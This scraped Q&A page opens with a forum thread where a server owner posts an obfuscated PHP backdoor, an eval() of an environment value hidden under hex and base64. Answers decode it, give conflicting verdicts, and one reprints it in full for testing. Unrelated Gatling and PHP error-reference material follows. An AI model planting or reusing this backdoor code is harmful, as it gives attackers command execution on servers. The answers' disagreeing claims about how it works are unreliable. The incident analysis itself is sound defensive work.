Suspicious file found on server - eval

I have found a suspicious file on my server, I am attempting to decode and figure out what it was put there to do.
The code is as follows, any tips on how to decode this.
<?php if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=#getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {#eval($mystr1s2235);} ?>
Thanks,
Alan.

The functions in php you're looking for appear to be a combination of base64_decode and urldecode. For example:
urldecode("\x6d\x79s\x74r\x31s\x311\x30");
gives "mystr1s110"
Also part of the string in the eval statement base64_decodes to:
function mystr1s78($mystr1s99){${"\x6d\x79s\x74r\x31s\x311\x30"}=mystr1s21::${"\x6dys\x74r1\x73178"};return ${"my\x73t\x72\x31s1\x310"}( mystr1s21::${${"\x6dy\x73tr\x31s9\x39"}} );}
Those encoded strings all reference variables defined earlier, for example \x6d\x79s\x74r\x31s\x311\x30 url-decodes to mystr1s110
This looks very nasty to me. Although I'm no security expert. I would just php -a and figure out what chunks are decoded how, then reconstruct the code from there.
On a side note. You pulled this off the server, right?
EDIT:
Was kind of intrigued by this. After a complete decode I got this:
<?php
if(!function_exists("myFunction2")){
class myClass {
static $myVar1="SFRUUF9IVFRQRA==";
static $myVar2=“base64_decode”;
}
function myFunction1($myArg)
{
${$myVar4}=myClass::$myVar2; // myClass::$myVar2 is just "base64_decode"
return $myVar4( myClass::${$myArg} ); // reuturning base64_decode of the argument
}
function myFunction2($myArg2)
{
return myClass::${$myVar3}
}
$myFinalVar=#getenv(myFunction1('myVar1')); //just gets env variable of base64 decode of myVar1
if($myFinalVar) {
#eval($myFinalVar); //executes
}
?>
Looks to me like its a script designed to execute a script on another server. (i.e. they could just hit the web address with their script in url and it would execute. SFRUUF9IVFRQRA== decodes to HTTP_HTTPD so they could hit http://yourwebsite.com/thisscript.php?HTTP_HTTPD=myscriptaddress.php and it would run whatever they wanted on your server.

According to me, it is not a harmful script, in fact, it is not of any use.
Here is the basis for my comments -
To decode, you can simply put the hex strings as argument to print_r().
print_r("b\x61\x73e\x364\x5fde\x63\x6fd\x65");
Complete decoded code is:
<?php
if(!function_exists("mystr1s45")){
class mystr1s21 {
static $mystr1s279="SFRUUF9IVFRQRA==";
static $mystr1s178="base64_decode";
}
eval(
eval(
function mystr1s78($mystr1s99){ // returns 'HTTP_HTTPD'
${mystr1s110}=mystr1s21::${mystr1s178};
return ${mystr1s110}( mystr1s21::${${mystr1s99}} );
}
);
eval(
function mystr1s45($mystr1s66) {
return mystr1s21::${${mystr1s66}};
}
);
);
}
$mystr1s2235=#getenv(mystr1s78("mystr1s279"));
if($mystr1s2235) {
#eval($mystr1s2235);
}
?>
The function mystr1s78 will return 'HTTP_HTTPD'. This will used as environment variable to get its value using getenv.
If you run the decoded code, you will face 'Parsing Error' near definition of function mystr1s78. This is because, eval expects a string and string must be a valid code statement(not expression).
Parse error: syntax error, unexpected 'mystr1s78' (T_STRING), expecting '('
As far as I know, by default, HTTP_HTTPD is not an environment variable which is set by apache or any webserver and even if it is a variable with some value, passing it to eval will not do anything.
To confirm, you can set an environment variable HTTP_HTTPD as follows:
<?php
apache_setenv('HTTP_HTTPD',<some_value>);
if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=#getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {#eval($mystr1s2235);}
?>
Please let us know if you think this is malicious and can harm the system.

Related

Gatling .sign issue

I am trying to build a Get request as follows and I would like CaseReference value to be populated via feeder .feed(CaseProviderSeq) but for some reason it's not picking CaseReference value and printing following for my println statement in .sign statement bellow
PATH KJ: /caseworkers/554355/jurisdictions/EMPLOYMENT/case-types/Manchester_Multiples/cases/$%7BCaseReference%7D/event-triggers/updateBulkAction_v2/token
My feeder CSV got following rows currently
1574761472170530
1574622770056940
so I am expecting this amended URL would be like
/caseworkers/554355/jurisdictions/EMPLOYMENT/case-types/Manchester_Multiples/cases/1574761472170530/event-triggers/updateBulkAction_v2/token
any idea what wrong I am doing here ??
.get(session => SaveEventUrl.replace(":case_reference","${CaseReference}").replaceAll("events", "") + s"event-triggers/${EventId}/token")
.header("ServiceAuthorization", s2sToken)
.header("Authorization", userToken)
.header("Content-Type","application/json")
.sign(new SignatureCalculator {
override def sign(request: Request): Unit = {
val path = request.getUri.getPath
println("PATH KJ: " + path)
request.getHeaders.add("uri", path)
}
})
This is not related to .sign, but your session attribute CaseReference not being interpreted. If you look closely you can see the braces %-encoded in $%7BCaseReference%7D.
Interpretation of the Gatling Expression Language strings happens only when a String is present when an Expression[Something] is needed1.
This bug you wrote is shown exactly in the warning in the documentation above.
I believe you can simply remove session => in your .get, so you are passing in a String rather than a Session => String2. That string will be implicitly converted to Expression[String]. That way Gatling will put the session attribute into the URL.
This happens because of the Scala implicit conversion.
In fact it is Session => Validation[String], because, again, of implicit conversions.

Problems with BBCode Helper in cakephp [duplicate]

What is this?
This is a number of answers about warnings, errors, and notices you might encounter while programming PHP and have no clue how to fix them. This is also a Community Wiki, so everyone is invited to participate adding to and maintaining this list.
Why is this?
Questions like "Headers already sent" or "Calling a member of a non-object" pop up frequently on Stack Overflow. The root cause of those questions is always the same. So the answers to those questions typically repeat them and then show the OP which line to change in their particular case. These answers do not add any value to the site because they only apply to the OP's particular code. Other users having the same error cannot easily read the solution out of it because they are too localized. That is sad because once you understood the root cause, fixing the error is trivial. Hence, this list tries to explain the solution in a general way to apply.
What should I do here?
If your question has been marked as a duplicate of this one, please find your error message below and apply the fix to your code. The answers usually contain further links to investigate in case it shouldn't be clear from the general answer alone.
If you want to contribute, please add your "favorite" error message, warning or notice, one per answer, a short description what it means (even if it is only highlighting terms to their manual page), a possible solution or debugging approach and a listing of existing Q&A that are of value. Also, feel free to improve any existing answers.
The List
Nothing is seen. The page is empty and white. (also known as White Page/Screen Of Death)
Code doesn't run/what looks like parts of my PHP code are output
Warning: Cannot modify header information - headers already sent
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given a.k.a.
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource
Warning: [function] expects parameter 1 to be resource, boolean given
Warning: [function]: failed to open stream: [reason]
Warning: open_basedir restriction in effect
Warning: Division by zero
Warning: Illegal string offset 'XXX'
Warning: count(): Parameter must be an array or an object that implements Countable
Parse error: syntax error, unexpected '['
Parse error: syntax error, unexpected T_XXX
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE
Parse error: syntax error, unexpected T_PAAMAYIM_NEKUDOTAYIM
Parse error: syntax error, unexpected 'require_once' (T_REQUIRE_ONCE), expecting function (T_FUNCTION)
Parse error: syntax error, unexpected T_VARIABLE
Fatal error: Allowed memory size of XXX bytes exhausted (tried to allocate XXX bytes)
Fatal error: Maximum execution time of XX seconds exceeded
Fatal error: Call to a member function ... on a non-object or null
Fatal Error: Call to Undefined function XXX
Fatal Error: Cannot redeclare XXX
Fatal error: Can't use function return value in write context
Fatal error: Declaration of AAA::BBB() must be compatible with that of CCC::BBB()'
Return type of AAA::BBB() should either be compatible with CCC::BBB(), or the #[\ReturnTypeWillChange] attribute should be used
Fatal error: Using $this when not in object context
Fatal error: Object of class Closure could not be converted to string
Fatal error: Undefined class constant
Fatal error: Uncaught TypeError: Argument #n must be of type x, y given
Notice: Array to string conversion (< PHP 8.0) or Warning: Array to string conversion (>= PHP 8.0)
Notice: Trying to get property of non-object error
Notice: Undefined variable or property
"Notice: Undefined Index", or "Warning: Undefined array key"
Notice: Undefined offset XXX [Reference]
Notice: Uninitialized string offset: XXX
Notice: Use of undefined constant XXX - assumed 'XXX' / Error: Undefined constant XXX
MySQL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ... at line ...
Strict Standards: Non-static method [<class>::<method>] should not be called statically
Warning: function expects parameter X to be boolean/string/integer
HTTP Error 500 - Internal server error
Deprecated: Arrays and strings offset access syntax with curly braces is deprecated
Also, see:
Reference - What does this symbol mean in PHP?
Warning: Cannot modify header information - headers already sent
Happens when your script tries to send an HTTP header to the client but there already was output before, which resulted in headers to be already sent to the client.
This is an E_WARNING and it will not stop the script.
A typical example would be a template file like this:
<html>
<?php session_start(); ?>
<head><title>My Page</title>
</html>
...
The session_start() function will try to send headers with the session cookie to the client. But PHP already sent headers when it wrote the <html> element to the output stream. You'd have to move the session_start() to the top.
You can solve this by going through the lines before the code triggering the Warning and check where it outputs. Move any header sending code before that code.
An often overlooked output is new lines after PHP's closing ?>. It is considered a standard practice to omit ?> when it is the last thing in the file. Likewise, another common cause for this warning is when the opening <?php has an empty space, line, or invisible character before it, causing the web server to send the headers and the whitespace/newline thus when PHP starts parsing won't be able to submit any header.
If your file has more than one <?php ... ?> code block in it, you should not have any spaces in between them. (Note: You might have multiple blocks if you had code that was automatically constructed)
Also make sure you don't have any Byte Order Marks in your code, for example when the encoding of the script is UTF-8 with BOM.
Related Questions:
Headers already sent by PHP
All PHP "Headers already sent" Questions on Stackoverflow
Byte Order Mark
What PHP Functions Create Output?
Fatal error: Call to a member function ... on a non-object
Happens with code similar to xyz->method() where xyz is not an object and therefore that method can not be called.
This is a fatal error which will stop the script (forward compatibility notice: It will become a catchable error starting with PHP 7).
Most often this is a sign that the code has missing checks for error conditions. Validate that an object is actually an object before calling its methods.
A typical example would be
// ... some code using PDO
$statement = $pdo->prepare('invalid query', ...);
$statement->execute(...);
In the example above, the query cannot be prepared and prepare() will assign false to $statement. Trying to call the execute() method will then result in the Fatal Error because false is a "non-object" because the value is a boolean.
Figure out why your function returned a boolean instead of an object. For example, check the $pdo object for the last error that occurred. Details on how to debug this will depend on how errors are handled for the particular function/object/class in question.
If even the ->prepare is failing then your $pdo database handle object didn't get passed into the current scope. Find where it got defined. Then pass it as a parameter, store it as property, or share it via the global scope.
Another problem may be conditionally creating an object and then trying to call a method outside that conditional block. For example
if ($someCondition) {
$myObj = new MyObj();
}
// ...
$myObj->someMethod();
By attempting to execute the method outside the conditional block, your object may not be defined.
Related Questions:
Call to a member function on a non-object
List all PHP "Fatal error: Call to a member function ... on a non-object" Questions on Stackoverflow
Nothing is seen. The page is empty and white.
Also known as the White Page Of Death or White Screen Of Death. This happens when error reporting is turned off and a fatal error (often syntax error) occurred.
If you have error logging enabled, you will find the concrete error message in your error log. This will usually be in a file called "php_errors.log", either in a central location (e.g. /var/log/apache2 on many Linux environments) or in the directory of the script itself (sometimes used in a shared hosting environment).
Sometimes it might be more straightforward to temporarily enable the display of errors. The white page will then display the error message. Take care because these errors are visible to everybody visiting the website.
This can be easily done by adding at the top of the script the following PHP code:
ini_set('display_errors', 1); error_reporting(~0);
The code will turn on the display of errors and set reporting to the highest level.
Since the ini_set() is executed at runtime it has no effects on parsing/syntax errors. Those errors will appear in the log. If you want to display them in the output as well (e.g. in a browser) you have to set the display_startup_errors directive to true. Do this either in the php.ini or in a .htaccess or by any other method that affects the configuration before runtime.
You can use the same methods to set the log_errors and error_log directives to choose your own log file location.
Looking in the log or using the display, you will get a much better error message and the line of code where your script comes to halt.
Related questions:
PHP's white screen of death
White screen of death!
PHP Does Not Display Error Messages
PHP emitting 500 on errors - where is this documented?
How to get useful error messages in PHP?
All PHP "White Page of Death" Questions on Stackoverflow
Related errors:
Parse error: syntax error, unexpected T_XXX
Fatal error: Call to a member function ... on a non-object
Code doesn't run/what looks like parts of my PHP code are output
"Notice: Undefined Index", or "Warning: Undefined array key"
Happens when you try to access an array by a key that does not exist in the array.
A typical example of an Undefined Index notice would be (demo)
$data = array('foo' => '42', 'bar');
echo $data['spinach'];
echo $data[1];
Both spinach and 1 do not exist in the array, causing an E_NOTICE to be triggered. In PHP 8.0, this is an E_WARNING instead.
The solution is to make sure the index or offset exists prior to accessing that index. This may mean that you need to fix a bug in your program to ensure that those indexes do exist when you expect them to. Or it may mean that you need to test whether the indexes exist using array_key_exists or isset:
$data = array('foo' => '42', 'bar');
if (array_key_exists('spinach', $data)) {
echo $data['spinach'];
}
else {
echo 'No key spinach in the array';
}
If you have code like:
<?php echo $_POST['message']; ?>
<form method="post" action="">
<input type="text" name="message">
...
then $_POST['message'] will not be set when this page is first loaded and you will get the above error. Only when the form is submitted and this code is run a second time will the array index exist. You typically check for this with:
if ($_POST) .. // if the $_POST array is not empty
// or
if ($_SERVER['REQUEST_METHOD'] == 'POST') .. // page was requested with POST
Related Questions:
Reference: “Notice: Undefined variable” and “Notice: Undefined index”
All PHP "Notice: Undefined Index" Questions on Stackoverflow
http://php.net/arrays
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given
First and foremost:
Please, don't use mysql_* functions in new code. They are no longer maintained and are officially deprecated. See the red box? Learn about prepared statements instead, and use PDO or MySQLi - this article will help you decide which. If you choose PDO, here is a good tutorial.
This happens when you try to fetch data from the result of mysql_query but the query failed.
This is a warning and won't stop the script, but will make your program wrong.
You need to check the result returned by mysql_query by
$res = mysql_query($sql);
if (!$res) {
trigger_error(mysql_error(),E_USER_ERROR);
}
// after checking, do the fetch
Related Questions:
mysql_fetch_array() expects parameter 1 to be resource, boolean given in select
All "mysql_fetch_array() expects parameter 1 to be resource, boolean given" Questions on Stackoverflow
Related Errors:
Warning: [function] expects parameter 1 to be resource, boolean given
Other mysql* functions that also expect a MySQL result resource as a parameter will produce the same error for the same reason.
Fatal error: Using $this when not in object context
$this is a special variable in PHP which can not be assigned. If it is accessed in a context where it does not exist, this fatal error is given.
This error can occur:
If a non-static method is called statically. Example:
class Foo {
protected $var;
public function __construct($var) {
$this->var = $var;
}
public static function bar () {
// ^^^^^^
echo $this->var;
// ^^^^^
}
}
Foo::bar();
How to fix: review your code again, $this can only be used in an object context, and should never be used in a static method. Also, a static method should not access the non-static property. Use self::$static_property to access the static property.
If code from a class method has been copied over into a normal function or just the global scope and keeping the $this special variable.
How to fix: Review the code and replace $this with a different substitution variable.
Related Questions:
Call non-static method as static: PHP Fatal error: Using $this when not in object context
Copy over code: Fatal error: Using $this when not in object context
All "Using $this when not in object context" Questions on Stackoverflow
Fatal error: Call to undefined function XXX
Happens when you try to call a function that is not defined yet. Common causes include missing extensions and includes, conditional function declaration, function in a function declaration or simple typos.
Example 1 - Conditional Function Declaration
$someCondition = false;
if ($someCondition === true) {
function fn() {
return 1;
}
}
echo fn(); // triggers error
In this case, fn() will never be declared because $someCondition is not true.
Example 2 - Function in Function Declaration
function createFn()
{
function fn() {
return 1;
}
}
echo fn(); // triggers error
In this case, fn will only be declared once createFn() gets called. Note that subsequent calls to createFn() will trigger an error about Redeclaration of an Existing function.
You may also see this for a PHP built-in function. Try searching for the function in the official manual, and check what "extension" (PHP module) it belongs to, and what versions of PHP support it.
In case of a missing extension, install that extension and enable it in php.ini. Refer to the Installation Instructions in the PHP Manual for the extension your function appears in. You may also be able to enable or install the extension using your package manager (e.g. apt in Debian or Ubuntu, yum in Red Hat or CentOS), or a control panel in a shared hosting environment.
If the function was introduced in a newer version of PHP from what you are using, you may find links to alternative implementations in the manual or its comment section. If it has been removed from PHP, look for information about why, as it may no longer be necessary.
In case of missing includes, make sure to include the file declaring the function before calling the function.
In case of typos, fix the typo.
Related Questions:
https://stackoverflow.com/search?q=Fatal+error%3A+Call+to+undefined+function
Parse error: syntax error, unexpected T_XXX
Happens when you have T_XXX token in unexpected place, unbalanced (superfluous) parentheses, use of short tag without activating it in php.ini, and many more.
Related Questions:
Reference: PHP Parse/Syntax Errors; and How to solve them?
Parse Error: syntax error: unexpected '{'
Parse error: Syntax error, unexpected end of file in my PHP code
Parse error: syntax error, unexpected '<' in - Fix?
Parse error: syntax error, unexpected '?'
For further help see:
http://phpcodechecker.com/ - Which does provide some more helpful explanations on your syntax woes.
Fatal error: Can't use function return value in write context
This usually happens when using a function directly with empty.
Example:
if (empty(is_null(null))) {
echo 'empty';
}
This is because empty is a language construct and not a function, it cannot be called with an expression as its argument in PHP versions before 5.5. Prior to PHP 5.5, the argument to empty() must be a variable, but an arbitrary expression (such as a return value of a function) is permissible in PHP 5.5+.
empty, despite its name, does not actually check if a variable is "empty". Instead, it checks if a variable doesn't exist, or == false. Expressions (like is_null(null) in the example) will always be deemed to exist, so here empty is only checking if it is equal to false. You could replace empty() here with !, e.g. if (!is_null(null)), or explicitly compare to false, e.g. if (is_null(null) == false).
Related Questions:
Fatal error: Can't use function the return value
MySQL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ... at line ...
This error is often caused because you forgot to properly escape the data passed to a MySQL query.
An example of what not to do (the "Bad Idea"):
$query = "UPDATE `posts` SET my_text='{$_POST['text']}' WHERE id={$_GET['id']}";
mysqli_query($db, $query);
This code could be included in a page with a form to submit, with an URL such as http://example.com/edit.php?id=10 (to edit the post n°10)
What will happen if the submitted text contains single quotes? $query will end up with:
$query = "UPDATE `posts` SET my_text='I'm a PHP newbie' WHERE id=10';
And when this query is sent to MySQL, it will complain that the syntax is wrong, because there is an extra single quote in the middle.
To avoid such errors, you MUST always escape the data before use in a query.
Escaping data before use in a SQL query is also very important because if you don't, your script will be open to SQL injections. An SQL injection may cause alteration, loss or modification of a record, a table or an entire database. This is a very serious security issue!
Documentation:
How can I prevent SQL injection in PHP?
mysql_real_escape_string()
mysqli_real_escape_string()
How does the SQL injection from the "Bobby Tables" XKCD comic work?
SQL injection that gets around mysql_real_escape_string()
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE
In PHP 8.0 and above, the message is instead:
syntax error, unexpected string content "", expecting "-" or identifier or variable or number
This error is most often encountered when attempting to reference an array value with a quoted key for interpolation inside a double-quoted string when the entire complex variable construct is not enclosed in {}.
The error case:
This will result in Unexpected T_ENCAPSED_AND_WHITESPACE:
echo "This is a double-quoted string with a quoted array key in $array['key']";
//---------------------------------------------------------------------^^^^^
Possible fixes:
In a double-quoted string, PHP will permit array key strings to be used unquoted, and will not issue an E_NOTICE. So the above could be written as:
echo "This is a double-quoted string with an un-quoted array key in $array[key]";
//------------------------------------------------------------------------^^^^^
The entire complex array variable and key(s) can be enclosed in {}, in which case they should be quoted to avoid an E_NOTICE. The PHP documentation recommends this syntax for complex variables.
echo "This is a double-quoted string with a quoted array key in {$array['key']}";
//--------------------------------------------------------------^^^^^^^^^^^^^^^
// Or a complex array property of an object:
echo "This is a a double-quoted string with a complex {$object->property->array['key']}";
Of course, the alternative to any of the above is to concatenate the array variable in instead of interpolating it:
echo "This is a double-quoted string with an array variable". $array['key'] . " concatenated inside.";
//----------------------------------------------------------^^^^^^^^^^^^^^^^^^^^^
For reference, see the section on Variable Parsing in the PHP Strings manual page
Fatal error: Allowed memory size of XXX bytes exhausted (tried to allocate XXX bytes)
There is not enough memory to run your script. PHP has reached the memory limit and stops executing it. This error is fatal, the script stops. The value of the memory limit can be configured either in the php.ini file or by using ini_set('memory_limit', '128 M'); in the script (which will overwrite the value defined in php.ini). The purpose of the memory limit is to prevent a single PHP script from gobbling up all the available memory and bringing the whole web server down.
The first thing to do is to minimise the amount of memory your script needs. For instance, if you're reading a large file into a variable or are fetching many records from a database and are storing them all in an array, that may use a lot of memory. Change your code to instead read the file line by line or fetch database records one at a time without storing them all in memory. This does require a bit of a conceptual awareness of what's going on behind the scenes and when data is stored in memory vs. elsewhere.
If this error occurred when your script was not doing memory-intensive work, you need to check your code to see whether there is a memory leak. The memory_get_usage function is your friend.
Related Questions:
All "Fatal error: Allowed memory size of XXX bytes exhausted" Questions on Stackoverflow
Warning: [function]: failed to open stream: [reason]
It happens when you call a file usually by include, require or fopen and PHP couldn't find the file or have not enough permission to load the file.
This can happen for a variety of reasons :
the file path is wrong
the file path is relative
include path is wrong
permissions are too restrictive
SELinux is in force
and many more ...
One common mistake is to not use an absolute path. This can be easily solved by using a full path or magic constants like __DIR__ or dirname(__FILE__):
include __DIR__ . '/inc/globals.inc.php';
or:
require dirname(__FILE__) . '/inc/globals.inc.php';
Ensuring the right path is used is one step in troubleshooting these issues, this can also be related to non-existing files, rights of the filesystem preventing access or open basedir restrictions by PHP itself.
The best way to solve this problem quickly is to follow the troubleshooting checklist below.
Related Questions:
Troubleshooting checklist: Failed to open stream
Related Errors:
Warning: open_basedir restriction in effect
Parse error: syntax error, unexpected T_PAAMAYIM_NEKUDOTAYIM
The scope resolution operator is also called "Paamayim Nekudotayim" from the Hebrew פעמיים נקודתיים‎. which means "double colon".
This error typically happens if you inadvertently put :: in your code.
Related Questions:
Reference: PHP Parse/Syntax Errors; and How to solve them?
What do two colons mean in PHP?
What's the difference between :: (double colon) and -> (arrow) in PHP?
Unexpected T_PAAMAYIM_NEKUDOTAYIM, expecting T_NS_Separator
Documentation:
Scope Resolution Operator (::)
Notice: Undefined variable
Happens when you try to use a variable that wasn't previously defined.
A typical example would be
foreach ($items as $item) {
// do something with item
$counter++;
}
If you didn't define $counter before, the code above will trigger the notice.
The correct way is to set the variable before using it
$counter = 0;
foreach ($items as $item) {
// do something with item
$counter++;
}
Similarly, a variable is not accessible outside its scope, for example when using anonymous functions.
$prefix = "Blueberry";
$food = ["cake", "cheese", "pie"];
$prefixedFood = array_map(function ($food) {
// Prefix is undefined
return "${prefix} ${food}";
}, $food);
This should instead be passed using use
$prefix = "Blueberry";
$food = ["cake", "cheese", "pie"];
$prefixedFood = array_map(function ($food) use ($prefix) {
return "${prefix} ${food}";
}, $food);
Notice: Undefined property
This error means much the same thing, but refers to a property of an object. Reusing the example above, this code would trigger the error because the counter property hasn't been set.
$obj = new stdclass;
$obj->property = 2342;
foreach ($items as $item) {
// do something with item
$obj->counter++;
}
Related Questions:
All PHP "Notice: Undefined Variable" Questions on Stackoverflow
"Notice: Undefined variable", "Notice: Undefined index", and "Notice: Undefined offset" using PHP
Reference: What is variable scope, which variables are accessible from where and what are "undefined variable" errors?
Notice: Use of undefined constant XXX - assumed 'XXX'
or, in PHP 7.2 or later:
Warning: Use of undefined constant XXX - assumed 'XXX' (this will throw an Error in a future version of PHP)
or, in PHP 8.0 or later:
Error: Undefined constant XXX
This occurs when a token is used in the code and appears to be a constant, but a constant by that name is not defined.
One of the most common causes of this notice is a failure to quote a string used as an associative array key.
For example:
// Wrong
echo $array[key];
// Right
echo $array['key'];
Another common cause is a missing $ (dollar) sign in front of a variable name:
// Wrong
echo varName;
// Right
echo $varName;
Or perhaps you have misspelled some other constant or keyword:
// Wrong
$foo = fasle;
// Right
$foo = false;
It can also be a sign that a needed PHP extension or library is missing when you try to access a constant defined by that library.
Related Questions:
What does the PHP error message “Notice: Use of undefined constant” mean?
Fatal error: Cannot redeclare class [class name]
Fatal error: Cannot redeclare [function name]
This means you're either using the same function/class name twice and need to rename one of them, or it is because you have used require or include where you should be using require_once or include_once.
When a class or a function is declared in PHP, it is immutable, and cannot later be declared with a new value.
Consider the following code:
class.php
<?php
class MyClass
{
public function doSomething()
{
// do stuff here
}
}
index.php
<?php
function do_stuff()
{
require 'class.php';
$obj = new MyClass;
$obj->doSomething();
}
do_stuff();
do_stuff();
The second call to do_stuff() will produce the error above. By changing require to require_once, we can be certain that the file that contains the definition of MyClass will only be loaded once, and the error will be avoided.
Parse error: syntax error, unexpected T_VARIABLE
Possible scenario
I can't seem to find where my code has gone wrong. Here is my full error:
Parse error: syntax error, unexpected T_VARIABLE on line x
What I am trying
$sql = 'SELECT * FROM dealer WHERE id="'$id.'"';
Answer
Parse error: A problem with the syntax of your program, such as leaving a semicolon off of the end of a statement or, like the case above, missing the . operator. The interpreter stops running your program when it encounters a parse error.
In simple words this is a syntax error, meaning that there is something in your code stopping it from being parsed correctly and therefore running.
What you should do is check carefully at the lines around where the error is for any simple mistakes.
That error message means that in line x of the file, the PHP interpreter was expecting to see an open parenthesis but instead, it encountered something called T_VARIABLE. That T_VARIABLE thing is called a token. It's the PHP interpreter's way of expressing different fundamental parts of programs. When the interpreter reads in a program, it translates what you've written into a list of tokens. Wherever you put a variable in your program, there is aT_VARIABLE token in the interpreter's list.
Good read: List of Parser Tokens
So make sure you enable at least E_PARSE in your php.ini. Parse errors should not exist in production scripts.
I always recommended to add the following statement, while coding:
error_reporting(E_ALL);
PHP error reporting
Also, a good idea to use an IDE which will let you know parse errors while typing. You can use:
NetBeans (a fine piece of beauty, free software) (the best in my opinion)
PhpStorm (uncle Gordon love this: P, paid plan, contains proprietary and free software)
Eclipse (beauty and the beast, free software)
Related Questions:
Reference: PHP Parse/Syntax Errors; and How to solve them?
Notice: Uninitialized string offset: *
As the name indicates, such type of error occurs, when you are most likely trying to iterate over or find a value from an array with a non-existing key.
Consider you, are trying to show every letter from $string
$string = 'ABCD';
for ($i=0, $len = strlen($string); $i <= $len; $i++){
echo "$string[$i] \n";
}
The above example will generate (online demo):
A
B
C
D
Notice: Uninitialized string offset: 4 in XXX on line X
And, as soon as the script finishes echoing D you'll get the error, because inside the for() loop, you have told PHP to show you the from first to fifth string character from 'ABCD' Which, exists, but since the loop starts to count from 0 and echoes D by the time it reaches to 4, it will throw an offset error.
Similar Errors:
Illegal string offset 'option 1'
Notice: Trying to get property of non-object error
Happens when you try to access a property of an object while there is no object.
A typical example for a non-object notice would be
$users = json_decode('[{"name": "hakre"}]');
echo $users->name; # Notice: Trying to get property of non-object
In this case, $users is an array (so not an object) and it does not have any properties.
This is similar to accessing a non-existing index or key of an array (see Notice: Undefined Index).
This example is much simplified. Most often such a notice signals an unchecked return value, e.g. when a library returns NULL if an object does not exists or just an unexpected non-object value (e.g. in an Xpath result, JSON structures with unexpected format, XML with unexpected format etc.) but the code does not check for such a condition.
As those non-objects are often processed further on, often a fatal-error happens next on calling an object method on a non-object (see: Fatal error: Call to a member function ... on a non-object) halting the script.
It can be easily prevented by checking for error conditions and/or that a variable matches an expectation. Here such a notice with a DOMXPath example:
$result = $xpath->query("//*[#id='detail-sections']/div[1]");
$divText = $result->item(0)->nodeValue; # Notice: Trying to get property of non-object
The problem is accessing the nodeValue property (field) of the first item while it has not been checked if it exists or not in the $result collection. Instead it pays to make the code more explicit by assigning variables to the objects the code operates on:
$result = $xpath->query("//*[#id='detail-sections']/div[1]");
$div = $result->item(0);
$divText = "-/-";
if (is_object($div)) {
$divText = $div->nodeValue;
}
echo $divText;
Related errors:
Notice: Undefined Index
Fatal error: Call to a member function ... on a non-object
Warning: open_basedir restriction in effect
This warning can appear with various functions that are related to file and directory access. It warns about a configuration issue.
When it appears, it means that access has been forbidden to some files.
